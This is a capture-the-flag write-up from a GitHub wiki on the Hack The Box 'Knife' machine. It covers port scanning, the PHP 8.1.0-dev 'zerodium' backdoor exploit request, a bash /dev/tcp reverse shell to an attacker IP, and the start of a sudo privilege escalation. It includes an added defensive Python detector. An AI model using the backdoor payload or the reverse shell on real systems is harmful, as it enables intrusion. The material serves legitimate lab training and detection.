HTB Knife - lmiyasato/lenny-hacking GitHub Wiki
This is just a quick & dirty writeup on the HTB Knife box.
Recon
Run an nmap scan of all TCP ports:
kali@kali:~/Documents/HTB/knife$ nmap -p- --min-rate 10000 -oA nmap-alltcp 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 22:12 EDT
Scanned at 2021-10-05 22:12:00 EDT for 50s
Not shown: 45253 closed ports, 20280 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Detailed scan on ports 22 & 80
kali@kali:~/Documents/HTB/knife$ nmap -p 22,80 -sCV -oA nmap-alltcp 10.10.10.242
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-05 22:15 EDT
Nmap scan report for 10.10.10.242
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory Brute Force:
Run the feroxbuster tool (similar to gobuster/FFUF, but much cooler)
kali@kali:~/Documents/HTB/knife$ feroxbuster -u http://10.10.10.242 -o ferozbuster-root-php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.10.242
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.3.3
 🔧  Config File           │ /etc/feroxbuster/ferox-config.toml
 💾  Output File           │ ferozbuster-root-php
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_10_10_242-1633487422.state ...
[##>-----------------] - 1m 26287/220545 11m found:0 errors:5
[##>-----------------] - 1m 26286/220545 271/s http://10.10.10.242
Initial exploit
The response headers show that the web page is running PHP/8.1.0-dev. This is the dev build that shipped with the backdoor planted in the PHP git repository in 2021: a server built from it evaluates whatever follows "zerodium" in a User-Agentt request header as PHP, so there is a ready-made exploit for it.
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 02:40:38 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5815
Connection: close
Content-Type: text/html; charset=UTF-8
Tweak the request as follows:
GET / HTTP/1.1
Host: 10.10.10.242
User-Agentt: zerodium system("id");
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Then replace "id" with a reverse shell pointing back at the attack box:
("bash -c 'bash -i >& /dev/tcp/10.10.14.28/443 0>&1'");
Set up a listener on the attack box:
kali@kali:~/Documents/HTB/knife$ sudo nc -nvlp 443
[sudo] password for kali:
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.242.
Ncat: Connection from 10.10.10.242:32842.
bash: cannot set terminal process group (972): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$
Now get a nicer shell and grab the user.txt flag:
james@knife:/$ python3 -c 'import pty;pty.spawn("bash")'
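Added defensive example, not part of the original writeup: a small Python checker that flags the backdoor trigger described above in captured requests (e.g. a proxy or WAF capture) and the PHP/8.1.0-dev banner in responses. The sample messages are constructed for the example.

```python
"""Flag the PHP 8.1.0-dev backdoor trigger in captured HTTP messages.
The backdoored build evaluates, as PHP, whatever follows 'zerodium' in a
'User-Agentt' request header. Sample messages below are constructed."""
import re
from typing import Dict, Optional, Tuple

BACKDOOR_HEADER = "user-agentt"   # header names are compared case-insensitively
BACKDOOR_MARKER = "zerodium"
BACKDOORED_BANNER = "PHP/8.1.0-dev"

# Constructed samples: a normal request, a triggering request and a response.
BENIGN_REQUEST = "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
TRIGGER_REQUEST = ("GET / HTTP/1.1\r\nHost: 10.10.10.242\r\n"
                   'User-Agentt: zerodium system("id");\r\nConnection: close\r\n\r\n')
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
                   "X-Powered-By: PHP/8.1.0-dev\r\nContent-Type: text/html\r\n\r\n<html>")


def parse_headers(raw: str) -> Tuple[str, Dict[str, str]]:
    """Return the start line and a dict of lower-cased header names to values."""
    head = re.split(r"\r?\n\r?\n", raw, maxsplit=1)[0]  # drop the body
    lines = head.splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # malformed header line, ignore it
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_backdoor_trigger(raw_request: str) -> Optional[str]:
    """Return the PHP a backdoored server would evaluate, or None if no trigger."""
    _, headers = parse_headers(raw_request)
    value = headers.get(BACKDOOR_HEADER, "")
    idx = value.lower().find(BACKDOOR_MARKER)
    if idx < 0:
        return None
    return value[idx + len(BACKDOOR_MARKER):].strip()


def is_backdoored_build(raw_response: str) -> bool:
    """True if the response advertises the backdoored dev build."""
    _, headers = parse_headers(raw_response)
    return headers.get("x-powered-by") == BACKDOORED_BANNER
```

Either finding on a production host is a strong signal: the banner means the build itself is compromised, and a trigger header in traffic means someone is probing for it.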
Privesc to root:
Run sudo -l to see what can be run as root. It shows that /usr/bin/knife can be run as root without a password. GTFOBins has an entry for knife...
james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife